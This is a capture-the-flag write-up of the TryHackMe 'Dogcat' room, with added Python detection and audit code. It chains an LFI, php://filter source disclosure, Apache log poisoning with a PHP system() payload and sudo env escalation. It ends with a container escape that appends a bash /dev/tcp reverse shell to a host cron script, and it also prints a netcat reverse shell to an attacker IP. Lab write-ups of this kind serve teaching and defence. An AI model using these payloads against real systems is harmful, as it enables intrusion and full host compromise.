---
# System prepended metadata

title: 'THM - Challenge : Dogcat'

---

## THM - Challenge : Dogcat

## 1. Reconnaissance

### Service Enumeration

An initial nmap scan was conducted to identify the active attack surface on the target host. The scan revealed two open ports running standard network services:
![image](https://hackmd.io/_uploads/rJBPEyVxGl.png)

![image](https://hackmd.io/_uploads/HkvzLJVlze.png)

### Endpoint Analysis & Debugging

Navigating to the web application on port 80 exposes a gallery application that allows users to view random images of dogs or cats by clicking the respective interface buttons.

The user interaction triggers a dynamic resource request managed via the `view` URL parameter: `/?view=dog` or `/?view=cat`. This pattern indicates that the backend dynamically includes local filesystem components based on user input, establishing a strong hypothesis for a Local File Inclusion (LFI) vulnerability.
![image](https://hackmd.io/_uploads/rkaKSJ4lfl.png)

## 2. Vulnerability Analysis

### Input Sanitization Defeat

Submitting arbitrary strings or standard directory traversal payloads returns an application-level error message: "Sorry, only dogs or cats are allowed." This response indicates that the backend performs a substring check (such as `strpos()`) that only requires the keyword `dog` or `cat` to appear somewhere in the parameter value.

To read the backend code without executing it, the `php://filter` stream wrapper was used to retrieve the source of the main controller as base64 (the `convert.base64-encode` filter prevents the PHP from being interpreted):
```
/?view=php://filter/convert.base64-encode/resource=dog
```
![image](https://hackmd.io/_uploads/Hk5kU14eGe.png)

![image](https://hackmd.io/_uploads/SkQ_Uy4lfx.png)

![image](https://hackmd.io/_uploads/HkpTIy4gzg.png)

```
/?view=php://filter/convert.base64-encode/resource=dog/../flag
```
![image](https://hackmd.io/_uploads/HySVP1EgGx.png)

The application successfully processed the payload because the input contained the mandatory `dog` keyword. Decoding the retrieved base64 string exposed the core application logic in `index.php`:
![image](https://hackmd.io/_uploads/S1TWsJ4eGg.png)
- Insufficient Validation: The `containsStr` function merely validates substring existence rather than performing strict positional validation or whitelist matching. This allows an attacker to fulfill the condition by appending directory traversal sequences directly after the keyword (e.g., `dog/../../`).
- Extension Manipulation: The application appends a default `.php` extension held in the `$ext` variable. However, the extension can be overridden by the client, because the code reads `$ext` from `$_GET["ext"]` whenever that parameter is present. Supplying an empty `&ext=` query parameter nullifies the extension logic and lets the `include` statement load arbitrary file types.

## 3. Initial Foothold

### LFI + Log Poisoning Exploitation

Server environment analysis indicated that `allow_url_include` was configured to `0` (Off), preventing Remote File Inclusion (RFI). Consequently, an Apache Log Poisoning vector was chosen to achieve Remote Code Execution (RCE).

First, the accessibility of the Apache log file via the LFI vector was verified by executing a path traversal query with an empty `ext` parameter.
![image](https://hackmd.io/_uploads/S1GvbgNxfx.png)

The log file rendered successfully in the HTTP response. Next, PHP code was injected into the log entries by setting the User-Agent header of a request to the following, using an intercepting proxy:
`<?php system($_GET['cmd']); ?>`
![image](https://hackmd.io/_uploads/ryis9mVlGx.png)

![image](https://hackmd.io/_uploads/S1vJNlVxMx.png)

Apache wrote the request, User-Agent payload included, to `access.log`. Including that log through the LFI with a `cmd` parameter then executed arbitrary system commands. A filesystem search was performed to locate flag files:
```
find / -name "*flag*.*" -type f 2>/dev/null
```
![image](https://hackmd.io/_uploads/HkpLmWExfe.png)
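As an added detection example (not part of the original write-up), the following Python parses Apache combined-format log lines and flags the indicators the chain above leaves behind: a `php://` wrapper or traversal in `view`, an empty `ext`, a `cmd` parameter, and a PHP tag in a request header. The sample log lines and the log path are constructed assumptions.

```python
import re
from urllib.parse import parse_qs, unquote, urlsplit

# Apache "combined" log line: ip ident user [ts] "METHOD path PROTO" status size "referer" "user-agent"
# Assumes the User-Agent contains no escaped double quotes (Apache logs those as \").
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>\S+) (?P<path>\S+) [^"]*" '
    r'(?P<status>\d{3}) \S+ "(?P<referer>[^"]*)" "(?P<ua>[^"]*)"$'
)
PHP_TAG = re.compile(r"<\?(php|=)")

# Constructed sample traffic reproducing the chain in this write-up; the log path is the
# Debian default and is an assumption.
SAMPLE_LOG = [
    '10.0.0.5 - - [01/Jan/2024:12:00:00 +0000] "GET /?view=dog HTTP/1.1" 200 512 "-" "Mozilla/5.0"',
    '10.0.0.9 - - [01/Jan/2024:12:00:01 +0000] "GET /?view=php://filter/convert.base64-encode/resource=dog HTTP/1.1" 200 2048 "-" "curl/8.0"',
    '10.0.0.9 - - [01/Jan/2024:12:00:02 +0000] "GET /?view=dog/../../../../var/log/apache2/access.log&ext= HTTP/1.1" 200 9000 "-" "<?php system($_GET[\'cmd\']); ?>"',
    '10.0.0.9 - - [01/Jan/2024:12:00:03 +0000] "GET /?view=dog/../../../../var/log/apache2/access.log&ext=&cmd=id HTTP/1.1" 200 9100 "-" "curl/8.0"',
]


def analyse(line: str) -> list[str]:
    """Return the indicator names that fire on one log line (empty list = nothing suspicious)."""
    m = LOG_RE.match(line)
    if not m:
        return ["unparseable"]
    hits = []
    qs = parse_qs(urlsplit(m["path"]).query, keep_blank_values=True)
    for view in qs.get("view", []):
        v = unquote(view)  # parse_qs decoded once; decode again to catch double-encoded traversal
        if v.startswith("php://"):  # stream wrapper such as php://filter (source disclosure)
            hits.append("php_wrapper")
        if "../" in v or "..\\" in v:  # traversal appended after the mandatory keyword
            hits.append("traversal")
    if qs.get("ext") == [""]:  # empty ext= neutralises the appended ".php"
        hits.append("empty_ext")
    if "cmd" in qs:  # command handed to the poisoned log entry
        hits.append("cmd_param")
    if PHP_TAG.search(m["ua"]) or PHP_TAG.search(m["referer"]):  # log-poisoning payload
        hits.append("php_in_header")
    return hits


def triage(lines: list[str]) -> dict[int, list[str]]:
    """Map the index of every suspicious line to its indicators; clean lines are omitted."""
    return {i: h for i, line in enumerate(lines) if (h := analyse(line))}
```

Running `triage(SAMPLE_LOG)` flags lines 1 to 3 and leaves the legitimate `view=dog` request alone; the same function can be fed a real `access.log` line by line.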

## 4. Privilege Escalation

Initial access via the log poisoning vector yielded execution context under the low-privileged `www-data` account. An evaluation of allowed system binaries with elevated privileges was performed using `sudo -l`. The output indicated that `www-data` was granted `NOPASSWD` access to execute `/usr/bin/env` as `root`.
![image](https://hackmd.io/_uploads/rySjQWElzl.png)

Following the GTFOBins entry for `env`, this misconfiguration gave an immediate privilege escalation:
```
/usr/bin/env /bin/sh -p -c "whoami && id"
```
![image](https://hackmd.io/_uploads/H15lN-4gfe.png)

The command executed `/bin/sh` with the `-p` flag, preserving the effective root user ID (`uid=0`). For stability, a reverse shell was then spawned by staging a statically compiled Netcat binary on the target and connecting back to the attacker's listener on port `1212`:
```
cmd=/usr/bin/env+/bin/sh+-p+-c+"./nc+192.168.140.112+1212+-e+'/bin/sh+-p'"
```
![image](https://hackmd.io/_uploads/ByaugMVxMx.png)
An interactive root shell was captured on the attacking machine. Flag 3 was located and retrieved within the environment.

### Environment Enumeration

```
/usr/bin/env /bin/sh -p -c "ls -al /"
```
![image](https://hackmd.io/_uploads/H1SXv-Vgfx.png)
Although root access was achieved, listing the root directory (`ls -al /`) revealed a `.dockerenv` file. This indicates that the shell is running inside a Docker container, so a container breakout is required to compromise the underlying host.

### Exploitation & Escape

Shell scripts on the filesystem were audited to identify anything shared between the container and the host, such as mounted volumes or scripts run by a host-side scheduler:

```
cmd=/usr/bin/env+/bin/sh+-p+-c+"find+/+-name+'*.sh'+-type+f+2>/dev/null"
```
![image](https://hackmd.io/_uploads/Hkjd3bNxGg.png)
![image](https://hackmd.io/_uploads/HJgXQGNlGx.png)
The investigation pointed to an anomaly located inside a mounted storage volume at `/opt/backups/backup.sh`.

Inspecting the contents of `/opt/backups/backup.sh` revealed the following maintenance code:
```
#!/bin/bash
tar cf /root/container/backup/backup.tar /root/container
```
![image](https://hackmd.io/_uploads/ryS4QfVlfx.png)
- Path Discrepancy: While the script file is hosted inside the container filesystem, the paths it operates on (`/root/container/...`) do not exist inside the container. They correspond to the directory structure of the host deployment.
- Cronjob Synchronization: This correlation implies that the host operating system executes this script natively via an automated task (`cron`) utilizing the host's root administrative privileges.
- Write Access: Because the container root account possesses write privileges over this mounted directory, modifying the script translates directly to modifying the execution instructions on the host machine.

#### Execution
A native Bash reverse shell string was appended to the end of the `backup.sh` script to target port `1213` on the attack host:
```
echo "bash -i >& /dev/tcp/192.168.140.112/1213 0>&1" >> /opt/backups/backup.sh
```
![image](https://hackmd.io/_uploads/ByTrmfNlfx.png)

A netcat listener was established on the attack host (`nc -nlvp 1213`). Within a 60-second window, the host cron daemon invoked the modified `backup.sh`.
![image](https://hackmd.io/_uploads/SyoLmzNgGg.png)

A root reverse shell was captured, granting administrative access on the underlying host and completing the container breakout.
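As an added host-side audit (not code from the room or its author), the following Python cross-checks a container's bind mounts against the host's `/etc/crontab` to catch the pattern exploited above: a script that host cron runs as root but that lives on a path the container can write. The mount list mirrors the shape of the `Mounts` array printed by `docker inspect`; the host-side mount path and the cron entries are constructed assumptions.

```python
import os
import shlex

# Constructed sample in the shape of the "Mounts" array that `docker inspect <container>` prints.
# The host-side Source of the /opt/backups mount is an assumption; the write-up does not state it.
SAMPLE_MOUNTS = [
    {"Type": "bind", "Source": "/root/container/backup", "Destination": "/opt/backups", "RW": True},
    {"Type": "volume", "Source": "/var/lib/docker/volumes/web/_data", "Destination": "/var/www/html", "RW": False},
]

# Constructed sample of host /etc/crontab entries (fields: m h dom mon dow user command).
SAMPLE_CRON = [
    "SHELL=/bin/sh",
    "# m h dom mon dow user command",
    "* * * * * root /root/container/backup/backup.sh",
    "0 3 * * * root /usr/bin/apt-get update -q",
]


def cron_command(line: str):
    """Return (user, argv) for one /etc/crontab entry, or None for comments, blanks and VAR=value lines."""
    line = line.strip()
    if not line or line.startswith("#") or "=" in line.split()[0]:
        return None
    fields = line.split(None, 6)
    if len(fields) < 7:
        return None
    return fields[5], shlex.split(fields[6])


def writable_from_container(host_path: str, mounts: list):
    """Return the read-write mount whose host Source contains host_path, else None."""
    real = os.path.normpath(host_path)
    for m in mounts:
        src = os.path.normpath(m["Source"])
        if m.get("RW") and (real == src or real.startswith(src + os.sep)):
            return m
    return None


def audit(cron_lines: list, mounts: list) -> list:
    """List host cron jobs whose command references an absolute path the container can modify."""
    findings = []
    for line in cron_lines:
        parsed = cron_command(line)
        if parsed is None:
            continue
        user, argv = parsed
        for token in argv:
            m = writable_from_container(token, mounts) if token.startswith("/") else None
            if m:  # report the host path and where the container sees it
                inside = os.path.join(m["Destination"], os.path.relpath(token, m["Source"]))
                findings.append({"user": user, "host_path": token, "container_path": inside})
    return findings
```

The fix for any finding is to mount the directory read-only (or keep scheduled scripts outside shared volumes); the audit also generalises to any cron entry that touches a writable bind mount, not only the backup script.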

## 5. Flag Retrieval